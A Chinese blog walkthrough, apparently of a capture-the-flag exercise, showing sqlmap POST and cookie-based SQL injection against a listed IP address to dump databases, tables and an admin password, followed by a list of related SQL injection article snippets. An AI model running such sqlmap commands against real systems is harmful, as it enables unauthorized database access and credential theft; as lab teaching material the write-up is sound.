2. 程式人生 > >sqlmap的post註入加cookie

sqlmap的post註入加cookie

阿新 發佈:2018-05-19
sqlmap cookie

1,首先看下這個網站


技術分享圖片



2,用抓包工具進行抓包

技術分享圖片


3,保存到txt文本文檔為1.txt;


技術分享圖片

4,sqlmap開始註入;

python2 sqlmap.py -r "C:\Users\95112\Desktop\1.txt" -p username --dbs

技術分享圖片


獲取表

python2 sqlmap.py -r "C:\Users\95112\Desktop\1.txt" -p username -D " sqli_database" --tables

技術分享圖片

python2 sqlmap.py -r "C:\Users\95112\Desktop\1.txt" -p username -D " sqli_database" -T "user" --columns

技術分享圖片


最終得到賬號是admin密碼u4g009


技術分享圖片


登錄成功,得到url

http://118.190.152.202:8011/?id=1

截取cookie

PHPSESSID=gvfqspfsid48p2lf8e6iv0s9d0

繼續sql註入

python2 sqlmap.py  -u "http://118.190.152.202:8011/?id=1" --cookie="PHPSESSID=gvfqspfsid48p2lf8e6iv0s9d0" --dbs

技術分享圖片

最終得到flag

技術分享圖片

sqlmap的post註入加cookie

相關推薦

sqlmap的postcookie

sqlmap cookie 1,首先看下這個網站2,用抓包工具進行抓包3,保存到txt文本文檔為1.txt;4,sqlmap開始註入;python2 sqlmap.py -r "C:\Users\95112\Desktop\1.txt" -p username --dbs獲取表py

實驗吧 看起來有點難(手工sqlmap

wid ati 實驗 alt 成功 技術 pytho code login 嗯~打開題目看見一個逼格有點高的圖 查看網頁源代碼,表單以get的方式傳送三個參數(admin,pass,action)給index.php,但是限制了兩個輸入框的最大長度是10,這個是前端的限制

18)添引號轉移函數,防止SQL

factor isset art .com md5 ati 出錯 pri 取數據 目錄機構:      然後我的改動代碼:     MysqlDB.class.php      1 <?php 2 3 /** 4

Cookie SQL

般的 ref 剛才 兩個 html cap get 我們 inf 轉自http://blog.sina.com.cn/s/blog_6b347b2a0101379o.html cookie註入其原理也和平時的註入一樣,只不過說我們是將提交的參數已cookie方式提交了,而一

cookie

lmap evel 9.1 fff user mar pre eve images (1)只有登陸框 ,暴力破解,弱口令,發現可以進去 (2)登陸進去後看看提示發現有很多報文字段,我們看到uname = YWRtaW4 解碼base64,發現為admin 第二個專抓取的g

【sqli-labs】 less21 Cookie Injection- Error Based- complex - string ( 基於錯誤的復雜的字符型Cookie)

基於 語句 inject cti mage src body 使用 技術 這個和less20是一樣的,唯一的不同在於添加了括號和使用了base64對cookie進行了編碼(因為使用了base64_decode解碼函數) admin被編碼成了YWRtaW4=但是執行的SQ

.net core2.0添json文件並轉化成類控制器使用

serialize don 程序 發現 tex mod onf -s 既然   上一篇,我們介紹了如何讀取自定義的json文件,數據是讀取出來了,只是處理的時候太麻煩,需要一遍一遍寫,很枯燥.那麽有沒有很好的辦法呢?經過鉆研,辦法有了.   既然一個一個讀取比較麻煩,那麽可

c#配置問題以及簡單防止sql,連接池問題,sqldatareader對象對於connection對象的釋放

c#添加引用。system configurationconfigurationManager.AppSettings[“”]<appSetings><add key=“” value=“”></appSetings><connectionStrings><

Spring 基礎知識 - 依賴

ans factory control 自己 int pac java str actor 所謂的依賴註入是指容器負責創建對象和維護對象間的依賴關系,而不是通過對象本身負責自己的創建和解決自己的依賴。 依賴註入主要目的是為了解耦,體現了一種“組合”的理念。 無論是xml配置

Spring中使用Map、Set、List、數組、屬性集合的方法配置文件

查看 main list highlight 配置 spring配置 pla lec while (1)下邊的一個Java類包含了所有Map、Set、List、數組、屬性集合等這些容器,主要用於演示spring的註入配置; [java] view plain c

SQL原理講解及防範

ant htm part 無效 快樂 日常 field users lib 原文地址:http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html 1.1.1 摘要 日前,國內最大的程序員社區CSDN網站

談談PHP網站的防SQL

效果 query 數據庫服務 data sqlite nbsp lds esc informix SQL(Structured Query Language)即結構化查詢語言。SQL 註入,就是把 SQL 命令插入到 Web 表單的輸入域或頁面請求參數的查詢字符串中,在 W

spring依賴的好處

源代碼 依賴 沒有 舉例 new 打開 pri 維護 eat spring依賴註入的好處,舉例子說明 舉個例子,比如你寫Apple apple = new Apple();People people = new People();people.eat(apple); 然後

表單提交 防XSS 1入庫時轉義、後臺 2出庫轉義、前臺

his 驗證 替換字符 插入 如果 不同的 js代碼 urn ida 第一種 入庫過濾js自動填充時過濾js代碼class GoodsModel extends Model{ // 填充 protected $_auto = [ // 自己補充填充

MySQL False及技巧總結

cap opener creat war foo 原因 blank 文檔 技巧 0x01 False Injection 引子 首先我們常見的註入 1=1 0<1 ‘‘=‘‘ 這些都是基於1=1這樣的值得比較的普通註入,下面來說說關於False註入,利用Fal

【代碼審計】XDCMS 報錯

信息 輸入 alt 變量 出現 img 語句 limit lec   審計的都是之前很老的一些的CMS,把學習的過程分享出來,如果有正在和我一起學習的兄弟們,希望看到文章之後會有所收獲 --------------------------------------------

9Python全站之路系列之MySQL SL

sql數據庫 password 應用程序 用戶名 字符串 Python全棧之路系列之MySQL SQL註入SQL註入是一種代碼註入技術,過去常常用於攻擊數據驅動性的應用,比如將惡意的SQL代碼註入到特定字段用於實施拖庫攻擊等。SQL註入的成功必須借助應用程序的安全漏洞,例如用戶輸入沒有經過

PDO防止SQL具體介紹

取代 能夠 article 數據庫 bsp 什麽 幫助 用戶 機會 <span style="font-size:18px;"><?php $dbh = new PDO("mysql:host=localhost; dbname=demo", "use

PHPCMS v9.6.0 wap模塊 SQL

sed injection update pytho see repl nbsp per pre 調試這個漏洞的時候踩了個坑,影響的版本是php5.4以後。 由於漏洞是由parse_str()函數引起的,但是這個函數在gpc開啟的時候(也就是php5.4以下)會對單引號進行

Joomla!3.7.0 Core SQL漏洞動態調試草稿

src cnblogs phpstorm prop ets legacy gets oom users 從這個頁面開始下斷點:Joomla_3.7.0/components/com_fields/controller.php 調用父類的構造